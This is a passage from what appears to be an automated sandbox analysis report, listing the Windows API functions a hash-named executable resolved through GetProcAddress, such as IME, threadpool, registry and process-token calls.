ImmAssociateContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter IsAppThemedW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateActCtx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateActCtxA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessage (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005752)\n 